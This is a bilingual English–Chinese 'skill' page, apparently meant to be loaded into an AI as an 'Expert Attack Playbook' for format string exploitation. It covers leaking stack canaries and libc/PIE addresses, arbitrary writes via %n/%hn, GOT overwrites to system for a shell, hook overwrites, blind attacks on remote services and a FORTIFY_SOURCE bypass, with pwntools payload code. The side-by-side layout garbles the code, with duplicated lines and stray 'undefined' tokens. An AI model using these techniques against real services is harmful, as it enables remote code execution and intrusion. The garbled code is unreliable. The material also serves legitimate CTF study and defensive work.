format-string-exploitation

Compare original and translation side by side

🇺🇸

Original

English
🇨🇳

Translation

Chinese

SKILL: Format String Exploitation — Expert Attack Playbook

SKILL: Format String Exploitation — 高级攻击手册

AI LOAD INSTRUCTION: Expert format string techniques. Covers stack reading, arbitrary write via %n, GOT overwrite, __malloc_hook overwrite, pointer chain exploitation, blind format string, FORTIFY_SOURCE bypass, 64-bit null byte handling, and pwntools automation. Distilled from ctf-wiki fmtstr, CTF patterns, and real-world scenarios. Base models often miscalculate positional parameter offsets or forget 64-bit address placement after format string.
AI加载说明:高级格式化字符串技术,涵盖栈读取、%n任意写入、GOT覆写、__malloc_hook覆写、指针链利用、盲格式化字符串攻击、FORTIFY_SOURCE绕过、64位空字节处理,以及pwntools自动化实现。内容提炼自ctf-wiki格式化字符串章节、CTF常见模式及真实场景。基础模型通常会错误计算位置参数偏移量,或者遗漏格式字符串后的64位地址放置规则。

0. RELATED ROUTING

0. 相关关联技能

  • stack-overflow-and-rop — combine format string leak with stack overflow for full exploit
  • binary-protection-bypass — format string is the primary canary/PIE/ASLR leak method
  • arbitrary-write-to-rce — convert format string write primitive to code execution targets
  • heap-exploitation — heap address leak via format string for heap exploitation

  • stack-overflow-and-rop — 结合格式化字符串泄露与栈溢出实现完整利用
  • binary-protection-bypass — 格式化字符串是泄露canary/PIE/ASLR的主要方法
  • arbitrary-write-to-rce — 将格式化字符串写入原语转换为代码执行能力
  • heap-exploitation — 通过格式化字符串泄露堆地址用于堆漏洞利用

1. VULNERABILITY IDENTIFICATION

1. 漏洞识别

Vulnerable Pattern

漏洞模式

c
printf(user_input);          // VULNERABLE: user controls format string
fprintf(fp, user_input);     // VULNERABLE
sprintf(buf, user_input);    // VULNERABLE
snprintf(buf, sz, user_input); // VULNERABLE

printf("%s", user_input);    // SAFE: format string is fixed
c
printf(user_input);          // VULNERABLE: user controls format string
fprintf(fp, user_input);     // VULNERABLE
sprintf(buf, user_input);    // VULNERABLE
snprintf(buf, sz, user_input); // VULNERABLE

printf("%s", user_input);    // SAFE: format string is fixed

Quick Test

快速测试

Input: AAAA%p%p%p%p%p%p%p%p
If output shows stack values (hex addresses): format string confirmed
Look for 0x4141414141414141 in output to find your input offset

Input: AAAA%p%p%p%p%p%p%p%p
If output shows stack values (hex addresses): format string confirmed
Look for 0x4141414141414141 in output to find your input offset

2. READING MEMORY

2. 内存读取

Stack Leak (%p)

栈泄露 (%p)

FormatActionUse
%p
Print next stack value as pointerSequential stack dump
%N$p
Print N-th parameter as pointerDirect positional access
%N$lx
Same as %p but explicit hex (64-bit)Portable
%N$s
Dereference N-th parameter as string pointerRead memory at pointer value
格式符作用用途
%p
将下一个栈值作为指针打印连续栈转储
%N$p
打印第N个参数作为指针直接位置访问
%N$lx
与%p功能相同,但显式输出64位十六进制值可移植
%N$s
将第N个参数作为字符串指针解引用读取指针指向的内存内容

Finding Your Input Offset

定位输入偏移

python
undefined
python
undefined

Send: AAAAAAAA.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p

Send: AAAAAAAA.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p

Output: AAAAAAAA.0x7ffd12340000.0x0.(nil).0x7f1234567890.0x4141414141414141...

Output: AAAAAAAA.0x7ffd12340000.0x0.(nil).0x7f1234567890.0x4141414141414141...

↑ offset = 6 (example)

↑ offset = 6 (example)

Or automated:

Or automated:

for i in range(1, 30): io.sendline(f'AAAA%{i}$p') if '0x41414141' in io.recvline(): print(f'Offset = {i}') break
undefined
for i in range(1, 30): io.sendline(f'AAAA%{i}$p') if '0x41414141' in io.recvline(): print(f'Offset = {i}') break
undefined

Leaking Specific Values

泄露特定值

TargetMethodStack Position
Canary
%N$p
where N = canary offset from format string
Typically at offset buf_size/8 + few
Saved RBP
%N$p
(just above return address)
Leaks stack address → stack base
Return address
%N$p
Leaks .text address (PIE base = leak & ~0xfff - offset)
Libc address
%N$p
where N points to
__libc_start_main+XX
return on stack
libc base = leak - offset
目标方法栈位置
Canary
%N$p
,N为格式字符串对应的canary偏移
通常位于buf_size/8 + 少量偏移处
Saved RBP
%N$p
(位于返回地址正上方)
泄露栈地址 → 栈基址
Return address
%N$p
泄露.text段地址(PIE基址 = 泄露值 & ~0xfff - 偏移)
Libc地址
%N$p
,N指向栈上的
__libc_start_main+XX
返回地址
libc基址 = 泄露值 - 偏移

Reading Arbitrary Address (%s)

读取任意地址 (%s)

undefined
undefined

32-bit: place address at start of format string

32-bit: place address at start of format string

payload = p32(target_addr) + b'%N$s' # N = offset where target_addr appears on stack
payload = p32(target_addr) + b'%N$s' # N = offset where target_addr appears on stack

64-bit: address contains null bytes → place AFTER format specifiers

64-bit: address contains null bytes → place AFTER format specifiers

payload = b'%8$sAAAA' + p64(target_addr) # %8$s reads from offset 8 where address is

---
payload = b'%8$sAAAA' + p64(target_addr) # %8$s reads from offset 8 where address is

---

3. WRITING MEMORY (%n)

3. 内存写入 (%n)

Write Specifiers

写入说明符

SpecifierBytes WrittenWidth
%n
4 bytes (int)Characters printed so far
%hn
2 bytes (short)Characters printed so far (mod 0x10000)
%hhn
1 byte (char)Characters printed so far (mod 0x100)
%ln
8 bytes (long)Characters printed so far
说明符写入字节数宽度
%n
4 bytes (int)到目前为止打印的字符数
%hn
2 bytes (short)到目前为止打印的字符数(mod 0x10000)
%hhn
1 byte (char)到目前为止打印的字符数(mod 0x100)
%ln
8 bytes (long)到目前为止打印的字符数

Arbitrary Write Technique

任意写入技术

Goal: Write value
V
to address
A
.
32-bit (address on stack directly):
python
undefined
目标:将值
V
写入地址
A
32位(地址直接放在栈上):
python
undefined

Write 2 bytes at a time using %hn

Write 2 bytes at a time using %hn

Place target addresses in format string (they'll be on stack)

Place target addresses in format string (they'll be on stack)

payload = p32(target_addr) # for low 2 bytes payload += p32(target_addr + 2) # for high 2 bytes
payload = p32(target_addr) # for low 2 bytes payload += p32(target_addr + 2) # for high 2 bytes

Calculate padding for each %hn write

Calculate padding for each %hn write

low = value & 0xffff high = (value >> 16) & 0xffff payload += f'%{low - 8}c%{offset}$hn'.encode() payload += f'%{(high - low) & 0xffff}c%{offset+1}$hn'.encode()

**64-bit** (address AFTER format string):
```python
low = value & 0xffff high = (value >> 16) & 0xffff payload += f'%{low - 8}c%{offset}$hn'.encode() payload += f'%{(high - low) & 0xffff}c%{offset+1}$hn'.encode()

**64位**(地址放在格式字符串之后):
```python

Addresses contain null bytes (0x00007fXXXXXXXX) which terminate string

Addresses contain null bytes (0x00007fXXXXXXXX) which terminate string

Solution: place addresses AFTER the format specifiers

Solution: place addresses AFTER the format specifiers

Step 1: format string portion (no null bytes)

Step 1: format string portion (no null bytes)

fmt = b'%Xc%N$hn%Yc%M$hn'
fmt = b'%Xc%N$hn%Yc%M$hn'

Step 2: pad to 8-byte alignment

Step 2: pad to 8-byte alignment

fmt = fmt.ljust(align, b'A')
fmt = fmt.ljust(align, b'A')

Step 3: append target addresses

Step 3: append target addresses

fmt += p64(target_addr) fmt += p64(target_addr + 2)
undefined
fmt += p64(target_addr) fmt += p64(target_addr + 2)
undefined

Byte-by-Byte Write with %hhn

使用%hhn逐字节写入

Write one byte at a time for precision (6 writes for full 48-bit address on 64-bit):
python
writes = {}
for i in range(6):
    byte_val = (value >> (i * 8)) & 0xff
    writes[target_addr + i] = byte_val
每次写入1字节保证精度(64位下完整48位地址需要6次写入):
python
writes = {}
for i in range(6):
    byte_val = (value >> (i * 8)) & 0xff
    writes[target_addr + i] = byte_val

pwntools handles the math:

pwntools handles the math:

from pwn import fmtstr_payload payload = fmtstr_payload(offset, writes, numbwritten=0, write_size='byte')

---
from pwn import fmtstr_payload payload = fmtstr_payload(offset, writes, numbwritten=0, write_size='byte')

---

4. PWNTOOLS fmtstr_payload()

4. PWNTOLS fmtstr_payload()

python
from pwn import *
python
from pwn import *

Overwrite GOT entry with target address

Overwrite GOT entry with target address

payload = fmtstr_payload( offset, # stack offset where input appears {elf.got['printf']: libc.symbols['system']}, # {addr: value} numbwritten=0, # bytes already output before our input write_size='short' # 'byte', 'short', or 'int' )
payload = fmtstr_payload( offset, # stack offset where input appears {elf.got['printf']: libc.symbols['system']}, # {addr: value} numbwritten=0, # bytes already output before our input write_size='short' # 'byte', 'short', or 'int' )

For 64-bit with addresses after format string:

For 64-bit with addresses after format string:

fmtstr_payload handles this automatically

fmtstr_payload handles this automatically

undefined
undefined

FmtStr Class (Interactive Exploitation)

FmtStr类(交互式利用)

python
from pwn import *

def send_payload(payload):
    io.sendline(payload)
    return io.recvline()

fmt = FmtStr(execute_fmt=send_payload)
python
from pwn import *

def send_payload(payload):
    io.sendline(payload)
    return io.recvline()

fmt = FmtStr(execute_fmt=send_payload)

fmt.offset is auto-detected

fmt.offset is auto-detected

fmt.write(elf.got['printf'], libc.symbols['system']) fmt.execute_writes()

---
fmt.write(elf.got['printf'], libc.symbols['system']) fmt.execute_writes()

---

5. GOT OVERWRITE VIA FORMAT STRING

5. 通过格式化字符串覆写GOT

Common Targets

常见目标

OverwriteWithTrigger
printf@GOT
system
Next
printf(user_input)
system(user_input)
, send
/bin/sh
strlen@GOT
system
If
strlen(user_input)
called
puts@GOT
system
If
puts(user_input)
called
atoi@GOT
system
If
atoi(user_input)
called (send
sh
as "number")
__stack_chk_fail@GOT
Controlled addrBypass canary check entirely
exit@GOT
main
Create infinite loop for multi-shot exploit
覆写目标替换为触发方式
printf@GOT
system
下一次调用
printf(user_input)
→ 执行
system(user_input)
,发送
/bin/sh
即可getshell
strlen@GOT
system
当程序调用
strlen(user_input)
时触发
puts@GOT
system
当程序调用
puts(user_input)
时触发
atoi@GOT
system
当程序调用
atoi(user_input)
时触发(发送
sh
作为"数字"即可)
__stack_chk_fail@GOT
可控地址完全绕过canary检查
exit@GOT
main
创建无限循环实现多轮利用

Hook Targets (glibc < 2.34)

Hook目标(glibc < 2.34)

TargetOne-gadgetTrigger
__malloc_hook
one_gadget addrAny
printf
with large format → internal
malloc
__free_hook
system
Trigger
free("/bin/sh")

目标替换为触发方式
__malloc_hook
one_gadget地址任意使用大格式的
printf
调用会触发内部
malloc
__free_hook
system
触发
free("/bin/sh")
即可

6. STACK POINTER CHAIN EXPLOITATION

6. 栈指针链利用

When format string is not directly on the stack (e.g., stored in a heap buffer referenced by stack pointer), use pointer chains on the stack to achieve arbitrary write.
当格式化字符串不直接存储在栈上时(例如存储在栈指针引用的堆缓冲区中),使用栈上的指针链实现任意写入。

Two-Stage Write

两阶段写入

Stack:
  [offset A] → ptr_X (stack address pointing to another stack address)
  [offset B] → ptr_Y (target of ptr_X)

Stage 1: Use %A$hn to modify ptr_X's low bytes → ptr_X now points to target_addr
Stage 2: Use %B$n to write through the modified ptr_X → writes to target_addr
This requires finding existing pointer chains on the stack (e.g., saved frame pointers forming a chain: rbp → prev_rbp → prev_prev_rbp).
Stack:
  [offset A] → ptr_X (stack address pointing to another stack address)
  [offset B] → ptr_Y (target of ptr_X)

Stage 1: Use %A$hn to modify ptr_X's low bytes → ptr_X now points to target_addr
Stage 2: Use %B$n to write through the modified ptr_X → writes to target_addr
该方法需要在栈上找到现有指针链(例如保存的帧指针形成的链:rbp → prev_rbp → prev_prev_rbp)。

Finding Pointer Chains

查找指针链

python
undefined
python
undefined

Leak stack with %p, look for:

Leak stack with %p, look for:

1. Stack address A at offset N that points to another stack address B

1. Stack address A at offset N that points to another stack address B

2. Stack address B at offset M

2. Stack address B at offset M

Modify value at A (using %N$hn) to change where B points

Modify value at A (using %N$hn) to change where B points

Then write through B (using %M$hn) to target

Then write through B (using %M$hn) to target


---

---

7. BLIND FORMAT STRING

7. 盲打格式化字符串

Remote service, no binary, no source — exploit format string blind.
远程服务,无二进制文件,无源码——盲打利用格式化字符串漏洞。

Methodology

方法流程

StepActionPurpose
1Send
%p
× 50
Dump stack, identify address patterns
2Identify offsetsFind libc addrs (0x7f...), stack addrs (0x7ff...), code addrs
3Find input offsetSend
AAAA%N$p
for N=1..50, find 0x41414141
4Identify binary baseCode addresses reveal PIE base (or fixed base if no PIE)
5Leak GOT entriesIf binary base known, read GOT via
%N$s
with GOT address
6Calculate libc baseGOT value - libc symbol offset
7Overwrite GOT
%n
to rewrite GOT entry with system address

步骤操作目的
1发送50个
%p
转储栈内容,识别地址模式
2识别偏移找出libc地址(0x7f开头)、栈地址(0x7ff开头)、代码地址
3定位输入偏移遍历N=1..50发送
AAAA%N$p
,找到返回0x41414141的偏移
4确定二进制基址代码地址可计算出PIE基址(无PIE则为固定基址)
5泄露GOT条目已知二进制基址后,通过带GOT地址的
%N$s
读取GOT内容
6计算libc基址GOT值 - libc符号偏移
7覆写GOT使用
%n
将GOT条目重写为system地址

8. FORTIFY_SOURCE BYPASS

8. FORTIFY_SOURCE绕过

FORTIFY_SOURCE
(gcc
-D_FORTIFY_SOURCE=2
) replaces
printf
with
__printf_chk
which forbids
%N$n
(positional writes).
FORTIFY_SOURCE
(gcc编译参数
-D_FORTIFY_SOURCE=2
)会将
printf
替换为
__printf_chk
禁止使用
%N$n
(位置写入)

Bypass Techniques

绕过技术

MethodDetail
Use
%hn
sequentially (no positional)
Print exact byte count,
%hn
, adjust,
%hn
— fragile but works
Stack-based exploitIf format string is on stack, use non-positional
%n
with stack position control
Heap overflow insteadFORTIFY doesn't protect heap — combine with heap bug
Return-to-printfROP to call unfortified
printf
(if available in binary or libc)

方法细节
顺序使用
%hn
(无位置参数)
打印精确字节数后调用
%hn
,调整后再调用
%hn
— 稳定性差但有效
基于栈的利用如果格式字符串在栈上,结合栈位置控制使用非位置参数的
%n
改用堆溢出FORTIFY不保护堆 — 结合堆漏洞利用
Return-to-printfROP调用未加固的
printf
(如果二进制或libc中存在)

9. 64-BIT CONSIDERATIONS

9. 64位注意事项

ChallengeSolution
Addresses contain
\x00
(null byte terminates format string)
Place addresses AFTER format specifiers, pad to alignment
Address width: 6 significant bytesWrite 3 ×
%hn
(2 bytes each) or 6 ×
%hhn
Larger stack offset rangeInput may be at offset 6+ due to 6 register args saved
48-bit address spaceOnly bottom 48 bits of 64-bit used
挑战解决方案
地址包含
\x00
(空字节会截断格式字符串)
将地址放在格式说明符之后,填充到对齐长度
地址宽度:6个有效字节写入3次
%hn
(每次2字节)或6次
%hhn
栈偏移范围更大由于6个寄存器参数入栈,输入偏移通常从6开始
48位地址空间64位地址仅使用低48位

Layout Template (64-bit)

布局模板(64位)

[format_string_specifiers][padding_to_8byte_align][addr1][addr2][addr3]...
 ← no null bytes here →                          ← null bytes OK (after fmt) →

[format_string_specifiers][padding_to_8byte_align][addr1][addr2][addr3]...
 ← no null bytes here →                          ← null bytes OK (after fmt) →

10. DECISION TREE

10. 决策树

Format string vulnerability confirmed (printf(user_input))
├── FORTIFY_SOURCE enabled? (__printf_chk)
│   ├── YES → positional %n blocked
│   │   ├── Sequential %n possible? → non-positional write
│   │   └── Combine with another primitive (heap, ROP)
│   └── NO → full positional %n available
├── What do you need first?
│   ├── Leak canary → %N$p at canary stack offset
│   ├── Leak PIE base → %N$p at return address offset → base = leak - known_offset
│   ├── Leak libc base → %N$p at __libc_start_main return on stack
│   ├── Leak heap base → %N$p at heap pointer on stack
│   └── Leak specific address → %N$s with target address on stack
├── Architecture?
│   ├── 32-bit → addresses at start of format string
│   └── 64-bit → addresses after format string (null byte issue)
├── Write target?
│   ├── Partial RELRO → GOT overwrite (printf→system, atoi→system)
│   ├── Full RELRO → __malloc_hook or __free_hook (pre-2.34)
│   ├── Full RELRO + glibc ≥ 2.34 → target _IO_FILE, exit_funcs, TLS_dtor_list
│   └── Stack return address → direct overwrite (if ASLR bypassed)
├── Single-shot or multi-shot?
│   ├── Loop (multi-shot) → overwrite GOT entry incrementally, use pointer chains
│   └── One-shot → fmtstr_payload() with all writes in single payload
└── Input not on stack? (heap buffer)
    └── Use stack pointer chains for indirect writes
确认存在格式化字符串漏洞(printf(user_input))
├── 是否开启FORTIFY_SOURCE? (__printf_chk)
│   ├── 是 → 位置参数%n被禁用
│   │   ├── 可使用顺序%n? → 非位置参数写入
│   │   └── 结合其他原语(堆漏洞、ROP)
│   └── 否 → 可使用完整位置参数%n
├── 首先需要获取什么?
│   ├── 泄露canary → 用canary栈偏移对应的%N$p
│   ├── 泄露PIE基址 → 返回地址偏移对应的%N$p → 基址 = 泄露值 - 已知偏移
│   ├── 泄露libc基址 → 栈上__libc_start_main返回地址对应的%N$p
│   ├── 泄露堆基址 → 栈上堆指针对应的%N$p
│   └── 泄露特定地址 → 栈上放置目标地址,使用%N$s
├── 架构?
│   ├── 32位 → 地址放在格式字符串开头
│   └── 64位 → 地址放在格式字符串之后(解决空字节问题)
├── 写入目标?
│   ├── 部分RELRO → GOT覆写(printf→system, atoi→system)
│   ├── 完全RELRO → __malloc_hook或__free_hook(glibc <2.34)
│   ├── 完全RELRO + glibc ≥ 2.34 → 目标_IO_FILE、exit_funcs、TLS_dtor_list
│   └── 栈返回地址 → 直接覆写(如果已绕过ASLR)
├── 单次利用还是多次利用?
│   ├── 循环(多次利用) → 增量覆写GOT条目,使用指针链
│   └── 单次利用 → fmtstr_payload()一次性构造所有写入的payload
└── 输入不在栈上?(堆缓冲区)
    └── 使用栈指针链实现间接写入